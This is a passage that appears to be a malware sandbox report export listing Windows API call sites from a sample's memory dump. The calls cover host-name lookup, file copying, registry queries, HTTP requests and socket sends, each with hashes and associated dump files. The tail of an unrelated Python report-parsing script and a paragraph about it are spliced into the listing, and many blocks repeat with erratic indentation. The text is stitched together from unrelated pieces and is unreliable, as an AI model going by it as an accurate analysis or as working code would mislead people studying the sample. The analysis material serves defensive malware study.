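• GetComputerNameA.KERNEL32(00000000), ref: 004314B3
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
• API ID: ComputerName
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041DEE6
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
APIs
• HttpOpenRequestA.WININET(?,0066C978,?,0066C97E,00000000,00000000,00C00100,00000000), ref: 004161AD
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    entries = parse_entries(SAMPLE)
    for call in (c for e in entries for c in e.calls):
        flags = http_open_request_flags(call)
        print(f"{call.ref:08X} {call.module}!{call.name}", " | ".join(flags[0]) if flags else "")
    print(dump_source_info(entries[0].meta), capabilities(entries))
```

Run as a script it prints one line per call site plus the decoded dump source and label set; on a full report export, feed the whole Code Analysis section to parse_entries. Flag bits that are not in the table come back in the leftover value rather than being silently dropped, which is the check you want when a builder starts setting flags you have not seen before.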
                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,0066C978,?,0066C97E,00000000,00000000,00C00100,00000000), ref: 004161AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID:
• API String ID: 1984915467-0
• Opcode ID: e3d81642adf4327e69780616ad0591ef9316bdd0ab05d7b36b574a620b0e8deb
• Instruction ID: 8a5e17ff852ccccc5a62063a681dbe78e7a81f8bb085fa1290191205e92529f8
• Opcode Fuzzy Hash: e3d81642adf4327e69780616ad0591ef9316bdd0ab05d7b36b574a620b0e8deb
• Instruction Fuzzy Hash: 4EF08C75704149AFCB00AB04ED98E13B7BBFBC8301705419CE9288B320EAB0A942EB85
APIs
• HttpOpenRequestA.WININET(?,0066C978,?,0066C97E,00000000,00000000,00C00100,00000000), ref: 004161AD
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID:
• API String ID: 1984915467-0
• Opcode ID: 8f6dda6248924234d635e8af3b8c181ff6bf969b703edfd6b0a7f0db1fa3578d
• Instruction ID: 0af835e9f8e3946d32fd0ef1b78fc67e35d36830793c2c2ee6dfd7f41c6e8ac0
• Opcode Fuzzy Hash: 8f6dda6248924234d635e8af3b8c181ff6bf969b703edfd6b0a7f0db1fa3578d
• Instruction Fuzzy Hash: 34F01C757041499FCB15AB14ED98E13B7BBFBC830170585ACE9288B320EAB0A942DB45
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 0041B707
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: f891180c816c2ce714b9b94be52c5b0d5947f96de4b7c6887099c7d46b47550f
• Instruction ID: a9a3b0816d14000c3ea72ae61eb84972967901e2d067d1671ff0420ce4462990
• Opcode Fuzzy Hash: f891180c816c2ce714b9b94be52c5b0d5947f96de4b7c6887099c7d46b47550f
• Instruction Fuzzy Hash: D1E092B1304204DFD764EB6CDC80B1A33D5ABC8314F040524F625C33E2D6E4AD424B4A
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 7cd4fe6ad6e59909534d91c24e1231c664b18193987a7460f1173d709761769e
• Instruction ID: eaab9e8a9426e774b26bb2b696fb2d154981afcd4da67c9ca37f8eab44f15547
• Opcode Fuzzy Hash: 7cd4fe6ad6e59909534d91c24e1231c664b18193987a7460f1173d709761769e
• Instruction Fuzzy Hash: ECF082369057148BC300FF6CDD48A5A7BE1AB85368F14462CDCA0973D2FA709A85C786
APIs
• InternetReadFile.WININET(?,?,00001000), ref: 0041A8B9
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 70473b9776f8fbec2df8be3835985cf797b0dcf06161b76048af219404e4a476
                                                                                                                                                                        • Instruction ID: 3f3af098fb4036b25e042372a9c0b8040bf2feed6365c7899ef2e352af89c852
                                                                                                                                                                        • Opcode Fuzzy Hash: 70473b9776f8fbec2df8be3835985cf797b0dcf06161b76048af219404e4a476
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E03031201215ABC30CDB19CD50D5A77E9AF94314B05001CF40697351EA70EC10CF49
                                                                                                                                                                        APIs
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(00000000), ref: 0041DFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID:
• API String ID: 1174141254-0
• Opcode ID: a81f6edcda9519f68eb628312b780929b02d8d025e6258539249c268bfd20d16
• Instruction ID: d76b79a6710608f41cc938a5665811dd89a91e65a213db72b95ff70d70da261f
• Opcode Fuzzy Hash: a81f6edcda9519f68eb628312b780929b02d8d025e6258539249c268bfd20d16
• Instruction Fuzzy Hash: 66E01A767051129FCB08DF7CECF09A933B4AB086043080068D516E7671EA64EA15CB59
APIs
• InternetReadFile.WININET(?,?,00001000), ref: 0041A8B9
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 98163165d41a6265e4b1349cfaa7fc5f053c76245e1aec657650d1bb14249df3
• Instruction ID: e48a13207e34c3cc3c155c8e222b5e783370ab62e081e48ae71adaea79e1e225
• Opcode Fuzzy Hash: 98163165d41a6265e4b1349cfaa7fc5f053c76245e1aec657650d1bb14249df3
• Instruction Fuzzy Hash: 0EE09271201505BFC30CEB59CD50DAA3BE9AF58350700001CF007C7360EAA09810CB4A
APIs
• RegQueryValueExA.KERNEL32(?,0066C369,00000000,?,?), ref: 00431FC7
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 6bbd52ad4ae57a3e5a9afa46785a769f00f41fd1592a8920a0533973d327d0dd
• Instruction ID: 121ede9e79b0c66b4d45e5d0b271e0c9a442427d309f9241aea8ba78e68c4315
• Opcode Fuzzy Hash: 6bbd52ad4ae57a3e5a9afa46785a769f00f41fd1592a8920a0533973d327d0dd
• Instruction Fuzzy Hash: F8F03931305240AFD741CF24CC54F2A7FA5EB89728F01496CEA409B270D2B198458F99
APIs
• VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4233825816-0
                                                                                                                                                                        • Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                        • Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
                                                                                                                                                                        • Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 004340E0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileModuleName
• String ID:
• API String ID: 514040917-0
• Opcode ID: 865520d10780318f970f547daf0b5d31f57344f31ebeba7182cb1bf40354999d
• Instruction ID: ca51c279364ed7a34ef5123a08d486975300b9fc14ea94294c6df30e4677ebe0
• Opcode Fuzzy Hash: 865520d10780318f970f547daf0b5d31f57344f31ebeba7182cb1bf40354999d
• Instruction Fuzzy Hash: 7AE086F63406109FD300E768ECCCE6E3764AB84715F194150F60187351FA705806C791
APIs
• RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00433588
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 144f5fb574037bd5d6c51d15a0cfce4e6123258bf981e09d139c33bf5d0938cc
• Instruction ID: 9ca681006a4df8a2f42092306652462c7e591157bf43050be3e71ff09d3458ee
• Opcode Fuzzy Hash: 144f5fb574037bd5d6c51d15a0cfce4e6123258bf981e09d139c33bf5d0938cc
• Instruction Fuzzy Hash: 7FE0E579210A059FE708CF64E8A4A2A33A5FF48708B128069E945DB3A1DA70AC01CB51
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: ConnectInternet
• String ID:
• API String ID: 3050416762-0
• Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
• Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
• Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
• Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2928410991-0
                                                                                                                                                                        • Opcode ID: 2c27bef4d936512bbc752b58650beefcb4077d5bc70cc4f6d228be923db93273
                                                                                                                                                                        • Instruction ID: bbf64815b54bf9c94cd81a65c3275e642d5f320fee5b34f5521ab9218da8d40b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c27bef4d936512bbc752b58650beefcb4077d5bc70cc4f6d228be923db93273
                                                                                                                                                                        • Instruction Fuzzy Hash: DEF01C71B18341DFD745DF29C59062ABBE1BFC8304F108A5DD48987314D7B098808F86
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,0066C2C5,00000000,00000000,?,?), ref: 004312A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 2ff90431de702270fc42ed0d686eb3fc24d6bf07174c7d0b39419fccb37daa3c
                                                                                                                                                                        • Instruction ID: 92a58d818af6cae4a7dc8d13fc8b1eb1d644e38e299c0ee5d789538d1fbc94b1
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ff90431de702270fc42ed0d686eb3fc24d6bf07174c7d0b39419fccb37daa3c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE04F31211550EFDA108F0AED4CDC7BFB5EFCC762B10006AF54446120D3729C55DB92
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00433384
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: d11945b5f68df22360419d1156e5013d8be46c824921572bef4fe2f4b0a2849e
                                                                                                                                                                        • Instruction ID: 4b251624aa07dd3db4fb81a5d44ae2743ede4de0d8738a09d87ee3887743dc91
                                                                                                                                                                        • Opcode Fuzzy Hash: d11945b5f68df22360419d1156e5013d8be46c824921572bef4fe2f4b0a2849e
                                                                                                                                                                        • Instruction Fuzzy Hash: FBE01A7E2007049FC214DF25EC40C5AB36AABC5B60F164655E82193799EB30BC458A92
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041CF36
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
